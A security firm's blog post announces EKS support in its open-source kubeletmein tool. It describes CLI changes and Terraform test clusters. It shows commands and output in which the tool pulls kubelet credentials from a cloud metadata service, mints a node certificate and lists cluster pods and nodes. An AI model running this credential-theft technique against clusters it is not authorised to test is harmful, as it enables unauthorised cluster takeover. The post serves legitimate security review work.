Kubeletmein, our open source tool for exploiting Kubernetes kubelet credentials, now supports AWS EKS.
I wrote kubeletmein back in 2018 and it's been really useful on our Kubernetes security reviews. Initially it only supported Google Kubernetes Engine, then DigitalOcean support was added, but it was always the goal to add AWS EKS and Azure AKS (though I've not yet done the research to understand whether the same exploit will work there).
I was blown away this week to receive a pull request from airman604 adding EKS support. It's always nice when someone finds software you've written useful, and even more amazing when they take the time to improve it and then contribute it back. Thank you.
I've merged the PR and taken the opportunity to make some other improvements.
Changes
- EKS support for both managed and unmanaged nodes (the user-data is different depending on which one you use).
- Command line options unified so now you just run kubeletmein <cloud>.
- Added tests for GKE and DigitalOcean (aws-sdk-go is not quite as easy to mock, or at least I've not got it to work yet).
- Added example Terraform configurations to fire up test clusters.
- Switched the Dockerfile to use the gcloud Debian image and install the AWS CLI, to support EKS authentication.
- Added --version flag.
EKS
One of the major differences with EKS is the control you have over user-data. This provides a lot of flexibility in the configuration of the worker nodes and the kubelet; however, it also makes writing support for all options pretty much impossible.
At the moment it will work with clusters created with eksctl and through the AWS Management Console. If you have custom user-data that calls /etc/eks/bootstrap.sh manually, this won't work right now. I'm going to try to add some parsing support for this soon.
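To give a flavour of the problem, a self-managed node group with custom user-data typically ends up calling the bootstrap script along these lines (everything here, from the cluster name to the kubelet args, is illustrative):

#!/bin/bash
# Illustrative custom user-data for a self-managed EKS node.
# The cluster name, endpoint, and CA values are placeholders.
set -o xtrace
/etc/eks/bootstrap.sh my-cluster \
  --apiserver-endpoint "${APISERVER_ENDPOINT}" \
  --b64-cluster-ca "${B64_CLUSTER_CA}" \
  --kubelet-extra-args '--node-labels=nodegroup=workers'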
From inside your pod you will need access to either aws-iam-authenticator or the AWS CLI (aws eks get-token) to access the cluster. If you are in a position to deploy our container image, it has everything you need. Just deploy a pod with the image 4armed/kubeletmein.
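If you can create pods, one minimal way to do that (the pod name is arbitrary and the sleep is just to keep the container alive):

$ kubectl run kubeletmein-vulnerable --image=4armed/kubeletmein --command -- sleep infinity
$ kubectl exec -ti kubeletmein-vulnerable -- bash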
Command Line Changes
This is a breaking change. GKE and DigitalOcean both create a bootstrap kubeconfig, then request a node certificate. This meant we used to run kubeletmein gke bootstrap or kubeletmein do bootstrap, then kubeletmein <provider> generate -n node-name. EKS doesn't work the same way. It just uses IAM authentication on the node, so the kubeconfig you generate is the one you keep using.
To keep the CLI experience consistent I refactored GKE and DO so they run both the bootstrap and generate steps in a single command. If you want to skip the bootstrap step you can use --skip-bootstrap, as in the sketch below.
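A sketch (I'm assuming the flag sits alongside the usual options):

root@kubeletmein-vulnerable:/# kubeletmein gke --skip-bootstrap -n foo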
So now GKE would look like this:
root@kubeletmein-vulnerable:/# kubeletmein gke -n foo
2021-03-04T22:25:52Z [ℹ] fetching kubelet creds from metadata service
2021-03-04T22:25:52Z [ℹ] writing ca cert to: ca-certificates.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet cert to: kubelet.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet key to: kubelet.key
2021-03-04T22:25:52Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] wrote bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] using bootstrap-config to request new cert for node: foo
2021-03-04T22:25:53Z [ℹ] got new cert and wrote kubeconfig
2021-03-04T22:25:53Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME READY STATUS RESTARTS AGE
kubeletmein-vulnerable 1/1 Running 0 12m
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get nodes
NAME STATUS ROLES AGE VERSION
gke-kubeletmein-kubeletmein-vulnerabl-6623dbee-mgkd Ready <none> 11m v1.18.12-gke.1210
Terraform
Testing this all out requires access to public cloud provider Kubernetes clusters. As you can imagine, you will want to spin these up and shut them down fairly regularly while you're looking at this, to avoid a large bill.
To make this easier I've added some example Terraform configurations too. Under the deploy/terraform folder you will find subfolders for each cloud provider service. Change into the required directory and edit the variables, if needed. You will need credentials configured for whichever provider you're going to use. Please check the links to the Terraform provider documentation in the repo if you're not sure how to do this.
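In short, for GKE it boils down to something like this (the gke subfolder name is my assumption; check the repo layout):

$ cd deploy/terraform/gke
$ export TF_VAR_project_id=your-gcloud-project-id
$ make init
$ make plan
$ make apply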
At the moment I've added GKE and DigitalOcean configurations. I've got a semi-working EKS configuration that's almost there, but that'll probably come out next week.
There's a Makefile included in each folder to help out with running the Terraform commands, but I'm assuming some familiarity with it. Basically, terraform init then terraform apply will work (though I'd recommend a plan first).
The plan will also deploy a pod named kubeletmein-vulnerable to the cluster, which you can just exec into when it's ready.
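A quick way to check when it's up (assuming your local kubectl context points at the new cluster):

$ kubectl get pod kubeletmein-vulnerable -w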
Sample output for GKE:
$ export TF_VAR_project_id=your-gcloud-project-id
$ make init
terraform get
terraform init \
-reconfigure \
-input=false \
-get=true \
-upgrade \
-backend=true \
-lock=true
Initializing the backend...
Initializing provider plugins...
- Finding latest version of hashicorp/google...
- Finding latest version of hashicorp/kubernetes...
- Installing hashicorp/google v3.58.0...
- Installed hashicorp/google v3.58.0 (signed by HashiCorp)
- Installing hashicorp/kubernetes v2.0.2...
- Installed hashicorp/kubernetes v2.0.2 (signed by HashiCorp)
Terraform has made some changes to the provider dependency selections recorded
in the .terraform.lock.hcl file. Review those changes and commit them to your
version control system if they represent changes you intended to make.
Terraform has been successfully initialized!
You may now begin working with Terraform. Try running "terraform plan" to see
any changes that are required for your infrastructure. All Terraform commands
should now work.
If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.
Then run a plan:
$ make plan
terraform plan -input=false -out "gke.tfplan"
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
<= read (data resources)
Terraform will perform the following actions:
# data.google_container_cluster.kubeletmein will be read during apply
# (config refers to values not yet known)
<= data "google_container_cluster" "kubeletmein" {
+ addons_config = (known after apply)
+ authenticator_groups_config = (known after apply)
[..]
Finally, apply the configuration. At this point you start getting billed, so don't forget about this cluster!!!
$ make apply
terraform apply "gke.tfplan"
google_container_cluster.kubeletmein: Creating...
google_container_cluster.kubeletmein: Still creating... [10s elapsed]
google_container_cluster.kubeletmein: Still creating... [20s elapsed]
google_container_cluster.kubeletmein: Still creating... [30s elapsed]
google_container_cluster.kubeletmein: Still creating... [40s elapsed]
google_container_cluster.kubeletmein: Still creating... [50s elapsed]
google_container_cluster.kubeletmein: Still creating... [1m0s elapsed]
google_container_cluster.kubeletmein: Still creating... [1m10s elapsed]
google_container_cluster.kubeletmein: Still creating... [1m20s elapsed]
[..]
Exec into the kubeletmein-vulnerable pod.
$ kubectl exec -ti kubeletmein-vulnerable bash
root@kubeletmein-vulnerable:/# kubeletmein gke -n foo
2021-03-04T22:25:52Z [ℹ] fetching kubelet creds from metadata service
2021-03-04T22:25:52Z [ℹ] writing ca cert to: ca-certificates.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet cert to: kubelet.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet key to: kubelet.key
2021-03-04T22:25:52Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] wrote bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] using bootstrap-config to request new cert for node: foo
2021-03-04T22:25:53Z [ℹ] got new cert and wrote kubeconfig
2021-03-04T22:25:53Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME READY STATUS RESTARTS AGE
kubeletmein-vulnerable 1/1 Running 0 12m
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get nodes
NAME STATUS ROLES AGE VERSION
gke-kubeletmein-kubeletmein-vulnerabl-6623dbee-mgkd Ready <none> 11m v1.18.12-gke.1210
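When you're done poking around, don't forget to tear the cluster down so the billing stops. From the same Terraform directory, terraform destroy will do it (I'd expect the Makefile to wrap this too, though treat that as an assumption):

$ terraform destroy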
Summary
You can find all the updates in the Kubeletmein GitHub repo.
I'll do another blog post soon about changes to public cloud providers and what's different in 2021 vs 2018, when I first wrote about this. GKE have made some big steps forward (Shielded VMs, for example). DigitalOcean are, well, the same as they ever were when it comes to security, so I don't see much change there. EKS is quite versatile, but it's a much more difficult setup experience security-wise.
I will also look at Azure, I promise.
I hope this tool is useful to you. If you have any questions or you’d like to speak to us about reviewing your Kubernetes infrastructure security, please just get in touch.